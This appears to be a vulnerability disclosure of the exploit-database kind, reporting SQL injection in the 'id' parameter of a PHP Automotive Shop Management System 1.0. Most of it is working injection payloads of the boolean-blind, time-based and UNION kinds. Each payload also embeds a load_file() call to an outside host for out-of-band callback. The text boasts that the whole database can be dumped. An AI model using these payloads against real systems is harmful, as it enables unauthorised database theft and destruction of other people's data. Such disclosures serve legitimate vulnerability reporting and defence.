## Title: ASMS - PHP (by: oretnom23 ) v1.0 SQLi ## Author: nu11secur1ty ## Date: 12.03.2022 ## Vendor: https://github.com/oretnom23, https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/download-code?nid=15312&title=Automotive+Shop+Management+System+in+PHP%2FOOP+Free+Source+Code ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0 ## Description: The `id` parameter appears to be vulnerable to SQL injection attacks. The attacker can dump all database information without any problems, and then he can destroy this system, it is depending from the scenario. ## STATUS: Critically awful [+] Payload: ```MySQL --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' OR NOT 9828=9828 AND 'NWsG'='NWsG Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' AND (SELECT 9682 FROM (SELECT(SLEEP(5)))Oifb) AND 'zARc'='zARc Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: id=7'+(select load_file('\\\\q3ui0l0datyx3tg6cov4tj0tpkvdj69u0xoobez3.stupid.com\\aze'))+'' UNION ALL SELECT NULL,CONCAT(0x7176626271,0x71504455436c68624e7878795354674d76627a4b4164756a4c46537651584b67584d744963504b5a,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/ASMS-1.0) ## Proof and Exploit: [href](https://streamable.com/c5v75u) ## Time spent `00:27:00` ## Time attack `00:01:57`